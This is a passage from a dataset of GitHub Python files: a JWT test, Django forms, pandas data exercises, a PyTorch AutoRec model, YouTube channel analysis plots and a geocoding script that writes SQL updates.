\"0d674da4ac7611eda8f78f77fa521b6e\"\n}\n\n# key_file = open('server.key', 'rb+')\n# private_bytes = key_file.read()\n# private_key = serialization.load_pem_private_key(\n# private_bytes, None, backend=default_backend()\n# )\n# cert_file = open('server.crt', 'rb+')\n# cert_str = cert_file.read()\n# cert_obj = load_pem_x509_certificate(cert_str)\n# public_key = cert_obj.public_key()\n# token = jwt.encode(payload_data, private_key, algorithm=\"RS256\")\n# print(jwt.decode(token, public_key, algorithms=['RS256', ]))\n\nmy_secret = 'guest'\n\ntoken = jwt.encode(\n payload=payload_data,\n key=my_secret,\n algorithm=\"HS256\"\n)\nprint(token)\n\n# print(jwt.decode(token, key=my_secret, algorithms=['HS256', ]))\n","repo_name":"relaypro-open/dog_api_python","sub_path":"src/jwt_test.py","file_name":"jwt_test.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19215730048","text":"from django import forms\nfrom djmoney.forms import MoneyField\nfrom django.forms import ModelForm, Form\n\nfrom .models import Fazenda, FazendaMedia\nimport re\n\nestados = (('',''),('AC','Acre AC'),('AL','Alagoas AL'),('AP','Amapá AP'),\n ('AM','Amazonas AM'),('BA','Bahia BA'),('CE','Ceará CE'),\n ('DF','Distrito Federal DF'),('ES','Espírito Santo ES'),\n ('GO','Goiás GO'),('MA','Maranhão MA'),('MT','Mato Grosso MT'),\n ('MS','Mato Grosso do Sul MS'),('MG','Minas Gerais MG'),('PA','Pará PA'),\n ('PB','Paraíba PB'),('PR','Paraná PR'),('PE','Pernambuco PE'),('PI','Piauí PI'),\n ('RJ','Rio de Janeiro RJ'),('RN','Rio Grande do Norte RN'),\n ('RS','Rio Grande do Sul RS'),('RO','Rondônia RO'),('RR','Roraima RR'),\n ('SC','Santa Catarina SC'),('SP','São Paulo SP'),('SE','Sergipe SE'),\n ('TO','Tocantins TO'))\n\nculturas = (('Lavoura','Lavoura'),('Pecuária','Pecuária'),('Dupla Aptidão','Dupla Aptidão'))\n\nclass FazendaForm(ModelForm):\n class Meta:\n model = Fazenda\n fields = ('nome', 'municipio', 'estado', \n 'area_total', 'area_aberta',\n 'cultura', 'infra', 'maquinario',\n 'local_ref', 'coordenada', 'valor',\n 'obs', 'encaminhado', 'oferta')\n\n nome = forms.CharField(label='nome', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n municipio = forms.CharField(label='municipio', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'})) \n\n estado = forms.CharField(label='estado', widget=forms.Select({\n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=estados))\n\n area_total = forms.IntegerField(label='area_total',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n area_aberta = forms.IntegerField(label='area_aberta',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n cultura = forms.CharField(label='cultura', widget=forms.Select(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=culturas))\n\n infra = forms.CharField(label='infra', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n maquinario = forms.CharField(label='maquinario', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n local_ref = forms.CharField(label='local_ref', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n coordenada = forms.CharField(label='coordenada', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n valor = forms.Form('valor',)\n\n obs = forms.CharField(label='obs', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4' }))\n \n encaminhado = forms.CharField(label='encaminhado', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n oferta = forms.CharField(label='oferta', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n\nclass UploadMedia(forms.Form):\n class Meta:\n model = FazendaMedia\n fields = ('imagem', 'video', 'audio')\n\n imagens = forms.FileField(label='imagem', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True,}))\n \n videos = forms.FileField(label='video', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n audios = forms.FileField(label='audio', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\nclass SearchForm(forms.Form):\n \n estado = forms.ChoiceField(\n widget=forms.Select(attrs={'class':'form-control',}), #'style':r'padding-left: calc(50% - 1em)' Para momdile\n choices=estados, \n initial=\"\",\n required=False)\n \n municipio = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete':'off',}),\n required=False)\n\n area_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}), \n required=False)\n\n area_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',\n 'oninput':\"this.form.range_area_max.value=this.value\"}), \n required=False)\n \n valor_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}),\n required=False)\n\n valor_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2', \n 'autocomplete': 'off',}),\n required=False,\n )","repo_name":"gconelhero/Fazendas","sub_path":"cadastro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23801200794","text":"import pandas as ps\n\"\"\"Readng the given csv and putting NaN values in place of **\"\"\"\ndata=ps.read_csv('6153237444115dat.csv',na_values=['*', '**', '***', '****', '*****', '******'])\n\n\n#PROBLEM FIRST\nprint(\"ANS OF FIRST PROBLEM\")\n\n\"\"\"- How many rows is there in the data?\n- What are the column names?\n- What are the datatypes of the columns?\n- What is the mean Fahrenheit temperature in the data? (`TEMP` column)\n- What is the standard deviation of the Maximum temperature? (`MAX` column)\n- How many unique stations exists in the data? (`USAF` column)\"\"\"\n\n\n\nprint('Total no. of row:',data.__len__())\nname=data.columns\nprint('Total columns ')\nfor i in name:\n print(i)\nprint('Datatypes:',data.dtypes)\nprint('mean od temp:',data['TEMP'].mean())\nprint('deviation of MAX:',data['MAX'].std())\nprint('unique',data['USAF'].unique())\n\n#PROBLEM TWO\nprint(\"ANS OF SECOUND\")\n\"\"\" - Select from the `data` columns `USAF, YR--MODAHRMN, TEMP, MAX, MIN` and assign them into a new variable called `selected`\n - Remove all rows from `selected` that has NoData in column `TEMP` using `dropna()` -function\n - Convert the Fahrenheit temperatures from `TEMP` into a new column `Celsius` using the conversion formula\n - Round the values in `Celsius` to have 0 decimals (**don't** create a new column --> update the current one)\n - Convert the `Celsius` values into integers (**don't** create a new column --> update the current one)\"\"\"\n\nselected=ps.concat([data['USAF'],data['YR--MODAHRMN'],data['TEMP'],data['MAX'],data['MIN']],axis=1)\n\nselected=selected.dropna(subset=['TEMP'])\n\nfor i in selected['TEMP']:\n convert(i)\n\n\nselected['Celsius']=a\nb=selected['Celsius'].round()\nselected.update(b)\na.clear()\nfor i in selected['Celsius']:\n a.append(int(i))\nselected['Celsius']=a\n\nprint(selected)\n\n#THIRD\nprint('ans of two')\n\"\"\"- Divide the selection into two separate datasets:\n - Select all rows from `selected` DataFrame into variable called `kumpula` where the `USAF` code is `29980`\n - Select all rows from `selected` DataFrame into variable called `rovaniemi` where the `USAF` code is `28450`\n- Save `kumpula` DataFrame into `Kumpula_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\n- Save `rovaniemi` DataFrame into `Rovaniemi_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\"\"\"\n\nkumpula=selected[selected['USAF']==29980]\nrovaniemi=selected[selected['USAF']==28450]\n\nkumpula.to_csv('Kumpula_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\nrovaniemi.to_csv('Rovaniemi_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\n#FORTH\nprint(\"ANS OF FORTH(part 1)\")\n\"\"\"**Part 1**\n\n- What was the median temperature in:\n - Helsinki Kumpula?\n - Rovaniemi?\"\"\"\nprint(kumpula['TEMP'].median())\nprint(rovaniemi['TEMP'].median())\nprint(\"ANS OF FORTH(part 2)\")\n\"\"\"\n- Select from `rovaniemi` and `kumpula` DataFrames such rows from the DataFrames where ``YR--MODAHRMN`` values are from May 2017 (see hints for help)\nand assign them into variables `rovaniemi_may` and `kumpula_may`\n- Do similar procedure for June and assign those values into variables `rovaniemi_june` and `kumpula_june`\n- Using those new subsets print the mean, min and max temperatures for both places in May and June.\"\"\"\nrovaniemi_may=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201705]\nkumpula_may=kumpula[kumpula['YR--MODAHRMN']//1000000==201705]\n\nrovaniemi_june=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201706]\nkumpula_june=kumpula[kumpula['YR--MODAHRMN']//1000000==201706]\n\nprint(kumpula_june['TEMP'].mean())\nprint(rovaniemi_june['TEMP'].mean())\nprint(kumpula_may['TEMP'].mean())\nprint(rovaniemi_may['TEMP'].mean())\n#FIFTH\nprint(\"ANS OF FIFTH\")\n\"\"\" - create a new DataFrame where you have calculated mean, max and min temperatures for each day separately using the\n hourly values from Rovaniemi and Helsinki Kumpula.\n - this problem is a classical data aggregation problem\"\"\"\na.clear()\nb=rovaniemi[['YR--MODAHRMN','TEMP']]\nfor i in b['YR--MODAHRMN']:\n a.append(i//100)\nb['YR--MODAHRMN']=a\nc=b.groupby('YR--MODAHRMN')\na.clear()\nb=[]\nce=[]\nh=[]\nfor x,y in c:\n a.append(y['TEMP'].mean())\n b.append(y['TEMP'].max())\n ce.append(y['TEMP'].min())\n h.append(x)\nd=ps.DataFrame({\n 'hour':h,\n 'mean':a,\n 'max':b,\n 'min':ce\n})\nd\n","repo_name":"lusiferjr/Pandas","sub_path":"project_1/data_exploration.py","file_name":"data_exploration.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26148430140","text":"class Diff2D:\n def __init__(self, m, n) -> None:\n self.m = m\n self.n = n\n\n self.diff = [[0]*(n+1) for _ in range(m+1)]\n self.result = [[0]*(n+1) for _ in range(m+1)]\n\n def set(self, x0, y0, x1, y1, val):\n \"\"\"\n top-left: (x0, y0)\n bottom-right: (x1, y1)\n \"\"\"\n diff = self.diff\n\n # 排容原理\n diff[x0][y0] += val\n diff[x0][y1+1] -= val\n diff[x1+1][y0] -= val\n diff[x1+1][y1+1] += val\n\n def compute(self):\n diff, result = self.diff, self.result\n\n # c b\n # a current\n result[0][0] = diff[0][0]\n for i in range(self.m):\n for j in range(self.n):\n a = result[i-1][j] if i-1 >= 0 else 0\n b = result[i][j-1] if j-1>= 0 else 0\n c = result[i-1][j-1] if i-1>=0 and j-1>=0 else 0\n result[i][j] = a + b - c + diff[i][j]\n","repo_name":"Vergil0327/leetcode-history","sub_path":"PrefixSum/DiffSum/2D-Difference Array/diff_2d.py","file_name":"diff_2d.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37414717731","text":"\"\"\"183. Customers Who Never Order\"\"\"\n\nimport pandas as pd\n\n\ndef find_customers(customers: pd.DataFrame, orders: pd.DataFrame) -> pd.DataFrame:\n result = customers[~customers.id.isin(orders[\"customerId\"])]\n\n result[\"Customers\"] = result[\"name\"]\n\n return result[[\"Customers\"]]\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/0183.py","file_name":"0183.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5648677389","text":"import numpy as np\nimport torch\nfrom torch import nn\n\n\nclass AutoRec(nn.Module):\n def __init__(self, num_user, latent_dim, dropout):\n super().__init__()\n self.encoder = nn.Linear(num_user, latent_dim)\n self.decoder = nn.Linear(latent_dim, num_user)\n self.dropout = nn.Dropout(dropout)\n self.relu = nn.ReLU()\n self.sig = nn.Sigmoid()\n\n def forward(self, x):\n out = self.encoder(x)\n # out = self.relu(out)\n out = self.sig(out)\n out = self.dropout(out)\n out = self.decoder(out)\n # out = self.relu(out)\n # Mask the gradient of unobserved user-item interaction during training\n if torch.is_grad_enabled():\n out = out * torch.sign(x)\n return out\n\n","repo_name":"gmsft/rec","sub_path":"models/AutoRec.py","file_name":"AutoRec.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70626828808","text":"import pandas as pd \nimport numpy \nimport scipy.stats as stats \nimport seaborn as sns\nimport matplotlib.pyplot as plot\n\nprint ('reading data file...')\ndata = pd.read_csv('nesarc_pds.csv', low_memory=False)\ndata.columns = map(str.upper, data.columns)\n\n# bug fix for display formats to avoid run time errors - put after code for loading data above\npd.set_option('display.float_format', lambda x:'%f'%x)\npd.set_option('display.max_rows', None)\n# Current drinkers(CONSUMER - DRINKING STATUS ) Either 1 (yes) or 2(no) to (S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA)\ndrinkerstemp=data[(data['CONSUMER'] ==1) & ((data['S7Q31A']=='1') | (data['S7Q31A']=='2'))]\n\n#Get rid of everything unneeded \ndrinkers = drinkerstemp[['S7Q31A','S2AQ8B','S2AQ8C','S2AQ10','S2BQ1A2','S2BQ1A4','S2BQ1A7', 'S2BQ1A8','S2BQ3B']].copy()\n\ndel drinkerstemp \ndel data\n\nfor col in drinkers: # Convert columns to numeric and replace 99's and nulls\n drinkers[col] = drinkers[col].convert_objects(convert_numeric=True)\n drinkers[col]=drinkers[col].replace(99 ,numpy.nan).fillna(numpy.nan)\n\nfor col in ['S2BQ1A2','S2BQ1A4','S2BQ1A7']: # Set missing values to Nan\n drinkers[col]=drinkers[col].replace(9 ,numpy.nan).fillna(numpy.nan)\n\ndrinkers['S7Q31A'] = drinkers['S7Q31A'].map({1:'SA',2:'NO_SA'}) # Give S7Q31A more intuitive names\n\n#PEARSON\n\ndrinkers_clean = drinkers[['S2BQ3B','S2AQ8B']].dropna()\n\nplt = sns.regplot(drinkers_clean['S2AQ8B'],drinkers_clean['S2BQ3B'])\nplt.set(xlabel='Number of drinks usually consumed', ylabel='Number of episodes of alcohol abuse')\n\nstats.pearsonr(drinkers_clean['S2BQ3B'],drinkers_clean['S2AQ8B'])\n\n#S2AQ10 - HOW OFTEN DRANK ENOUGH TO FEEL INTOXICATED IN LAST 12 MONTHS')\n#S2AQ8B NUMBER OF DRINKS OF ANY ALCOHOL USUALLY CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n#S2AQ8C LARGEST NUMBER OF DRINKS OF ANY ALCOHOL CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED')\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT')\n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED')\n#S2BQ1A8 - EVER HAVE PERIOD WHEN KEPT DRINKING LONGER THAN INTENDED') \n#S2BQ3B - NUMBER OF EPISODES OF ALCOHOL ABUSE)\n","repo_name":"jamesrmccallum/Coursera","sub_path":"Pearson/Corr_Co.py","file_name":"Corr_Co.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18526785989","text":"import pandas as pd\nimport numpy as np\nimport string\nfrom collections import Counter\nfrom PIL import Image\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport sys\nimport dateutil.parser\nimport isodate\nimport scipy.stats as stats\nimport datetime\nfrom matplotlib.gridspec import GridSpec\n\ndef pareto_plot(df, \n x=None, \n y=None, \n title=None, \n number_categories = 10, \n show_pct_y=False, \n pct_format='{0:.0%}'):\n \n '''adapted from mostly from https://tylermarrs.com/posts/pareto-plot-with-matplotlib/ except as indicated'''\n\n import matplotlib.pyplot as plt\n\n dfplot = df[[x,y]]\n\n dfsorted = dfplot.sort_values(y, ascending=False)\n \n df_shortened = dfsorted[0:number_categories] #added for when there are too many categories to plot\n df_remaining = dfsorted[number_categories:df.shape[0]]\n \n xlabel = x\n ylabel = y\n tmp = df_shortened.sort_values(y, ascending=False)\n tmp = tmp.append({x : 'Other' , y : df_remaining[y].abs().sum()}\n , ignore_index=True) #adds in an other category which has the sum of the remainder\n x = tmp[x].values\n y = tmp[y].values\n weights = y / y.sum()\n cumsum = weights.cumsum()\n\n \n fig, ax1 = plt.subplots(figsize = (6,6)) #figsize adjusted to account for rotated labels\n ax1.bar(x, y)\n ax1.set_xlabel(xlabel)\n ax1.tick_params(axis = 'x', rotation = 90) #rotation for longer category names\n ax1.set_ylabel(ylabel)\n \n ax2 = ax1.twinx()\n #ax2.ylim(0, 1.0) \n ax2.plot(x, cumsum, '-ro', alpha=0.5)\n ax2.set_ylabel('', color='r')\n ax2.tick_params('y', colors='k', rotation = 'auto')\n ax2.set_ylim([0,1])\n \n \n vals = ax2.get_yticks()\n ax2.set_yticklabels(['{:,.2%}'.format(x) for x in vals])\n\n # hide y-labels on right side\n if not show_pct_y:\n ax2.set_yticks([])\n \n formatted_weights = [pct_format.format(x) for x in cumsum]\n for i, txt in enumerate(formatted_weights):\n ax2.annotate(txt, (x[i], cumsum[i]), fontweight='heavy') \n \n if title:\n plt.title(title)\n \n plt.tight_layout()\n plt.show();\n\ndef sorted_bar_plot(df,x,y):\n\n dfplot = df[[x, y]]\n dfsorted = dfplot.sort_values(y, ascending=False)\n\n #dfplot.head()\n\n xlabel = x\n ylabel = y\n\n x = dfsorted[x].values\n y = dfsorted[y].values\n\n fig, ax = plt.subplots(figsize = (12, 6))\n\n ax.bar(x,y)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.tick_params(axis = 'x', rotation = 90)\n\ndef plot_relationships(df, x, y, title=None, xlim=None, ylim=None):\n '''x vs y scatterplot with an uneccesarily complicated name\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n \n x = dfplot[x].values\n y = dfplot[y].values\n \n fig, ax1 = plt.subplots(figsize = (6,6))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n ax1.set_xlim(xlim)\n ax1.set_ylim(ylim)\n\ndef label_points(x, y, val, ax='ax'):\n '''labels points on a scatterplot\n '''\n a = pd.concat({'x': x, 'y': y, 'val': val}, axis=1)\n for i, point in a.iterrows():\n ax.text(point['x'], point['y'], str(point['val']))\n\ndef plot_with_line_of_fit(df,x,y,title=None):\n '''produces an x vs y scatter plot with a linear line of best fit\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(\n x,\n y)\n\n line = slope*x+intercept\n\n\n fig, ax1 = plt.subplots(figsize = (6,4))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n ax1.plot(x, line)\n\ndef line_of_fit(df, x, y):\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n \n line = slope*x + intercept\n \n return line\n\ndef word_count(df, col):\n '''while this is used to make a word count, it really just generates three\n lists of words.\n Index 0 = all words in a list of lists\n Index 1 = all words in a singe, flat list\n Index 2 = unique list of words\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud(df, col):\n '''adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count(df,col)[1]))\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n\nvideo_deets_df = pd.read_csv('../data/video_deets_df.csv')\n\ntitle_dict = {}\nfor i in video_deets_df['channelTitle'].unique():\n value = i.lower().split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in value]\n title_dict[i] = no_punctuation\n\nflat_title_words = []\nfor sublist in list(title_dict.values()):\n for item in sublist:\n flat_title_words.append(item)\nunique_title_words = list(np.unique(flat_title_words))\n\ndef word_count_omit_words(df, col, omit_words = title_dict):\n '''Something in this function doesn't quote work, but the intention was to\n use this, for instance, to make a word cloud of words that are in the video\n title, but NOT in the channel titel.\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n for j in no_punctuation:\n if j not in omit_words:\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud_omit_words(df, col):\n '''Accompanying function to word_count_omit_words\n adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count_omit_words(df,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n\ndef create_sub_df(chan,col):\n video_title_df = video_deets_df[['channelTitle',col,'viewCount']]\n data = video_title_df[video_title_df['channelTitle']==chan]\n data = data[[col,'viewCount']]\n data_dict = {}\n\n for i, row in data.iterrows():\n data_dict[i] = [row['viewCount'],row[col].lower().split()]\n \n return data, data_dict\n\ndef top_videos_per_channel(chan, quant):\n '''Returns the top quant % videos from channel = chan'''\n df = video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n return df\n\ndef wordcloud_all_vs_top_words_per_channel(df, chan, col, quant):\n #### from https://www.datacamp.com/community/tutorials/wordcloud-python\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud1 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' '.join(word_count(video_deets_df[video_deets_df.channelTitle == chan]\n ,col)[1])\n )\n wordcloud2 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' '.join(word_count(video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n ,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig = plt.figure(figsize=(12,12))#subplots(1,2, figsize=(12,12))\n fig.suptitle(\"Most Popular Words in {} from {}\".format(col, chan), y=.65, fontsize=18)\n gs = fig.add_gridspec(1, 2)\n \n ax1 = fig.add_subplot(gs[0, 0])\n ax1.imshow(wordcloud1, interpolation='bilinear')\n ax1.axis(\"off\")\n ax1.set_title('All Videos')\n \n ax2 = fig.add_subplot(gs[0, 1])\n ax2.imshow(wordcloud2, interpolation='bilinear')\n ax2.axis(\"off\")\n ax2.set_title('{}% Most Popular Videos'.format(round((1-quant)*100)))\n\ndef channel_hist(chan, mostviews, quant):\n \n data = create_sub_df(chan,'videoTitle')[0].viewCount\n \n fig, ax = plt.subplots()\n\n N, bins, patches = ax.hist(data,\n edgecolor='white', \n linewidth=1, \n bins = 30,\n range = (0,mostviews))\n\n for patch, leftside, rightside in zip(patches, bins[:-1], bins[1:]):\n if rightside > np.percentile(data,quant):\n patch.set_facecolor('r')\n \n ax.set_xlabel('Views')\n ax.tick_params(axis = 'x', rotation = 90)\n ax.set_ylabel('Video Count')\n ax.set_title('Distribution of Views for {}'.format(chan))","repo_name":"scottfeldmanpeabody/MTB-YouTube-EDA","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":11308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42195509665","text":"import mysql.connector\nimport ogr\nimport pycountry\nimport dbconfig\n\n# find cities without geo information in db, and add geo info via ESRI\n\n# because getting the data from db takes some time, we cache it in a file\n# called 'cities_nogeo.p'\n\ndb = mysql.connector.connect(user=dbconfig.user, password=dbconfig.password\n\t\t\t\t\t\t\t, host='localhost', database = 'bt')\n\ncursor = db.cursor(buffered = True)\n\nsql = (\"SELECT f_city, f_country FROM ot WHERE f_lon IS NULL AND f_lat IS NULL AND f_city IS NOT NULL AND f_country IS NOT NULL GROUP BY f_lon, f_lat, f_city, f_country;\")\n\ncursor.execute(sql)\nresult = cursor.fetchall()\ndata = [row for row in result]\n\ncursor.close()\ndb.close()\n\t\ndrv = ogr.GetDriverByName('ESRI Shapefile')\nds2_in = drv.Open(\"shapes/gadm28_adm2.shp\")\nlyr2_in = ds2_in.GetLayer(0)\nds3_in = drv.Open(\"shapes/gadm28_adm3.shp\")\nlyr3_in = ds3_in.GetLayer(0)\nds4_in = drv.Open(\"shapes/gadm28_adm4.shp\")\nlyr4_in = ds4_in.GetLayer(0)\n\ndef checkCity(layer, field, data):\n\tfound = []\n\tfailed = []\n\tfor (city, country) in data:\n\t\tc3 = pycountry.countries.get(alpha_2=country).alpha_3\n\t\tf = False\n\t\tfor feature in layer:\n\t\t\tcityname = feature.GetField(field)\n\t\t\tiso = feature.GetField('ISO')\n\t\t\tif (iso == c3 and cityname is not None and cityname.decode('utf-8') == city):\n\t\t\t\tgeo = feature.GetGeometryRef().Centroid()\n\t\t\t\tfound.append((city, country, geo)) \n\t\t\t\tf = True\n\t\tlayer.ResetReading()\n\t\tif not f:\n\t\t\tfailed.append((city, country))\n\n\treturn {'found':found,'notfound':failed}\n\t\n# we test against different types of municipalities and districts\n# orders matters, we want to go from smaller to bigger units\nassigned = []\nresult = checkCity(lyr4_in, 'NAME_4', data)\nassigned = assigned + result['found']\nresult = checkCity(lyr3_in, 'NAME_3', result['notfound'])\nassigned = assigned + result['found']\nresult = checkCity(lyr2_in, 'NAME_2', result['notfound'])\nassigned = assigned + result['found']\n\ndoublette = []\nsingle = []\nfor obj in assigned:\n\tfound = False\n\tfor s in single:\n\t\tif obj[0] == s[0]:\n\t\t\tfound = True\n\tif found:\n\t\tdoublette.append(obj)\n\telse:\n\t\tsingle.append(obj)\n\nfor d in doublette:\n\tfor s in single:\n\t\tif d[0] == s[0]:\n\t\t\tsingle.remove(s)\n\t\t\tdoublette.append(s)\n\n\nfh = open('generated/207_addlonlat.sql','wb')\nfor point in single:\n\tsql = (\"UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], point[0].encode('utf-8')))\nfh.close()\n\nfh = open('generated/207_addlonlat_manual.sql','wb')\nfor point in doublette:\n\tsql = (\"/* UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';*/\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], 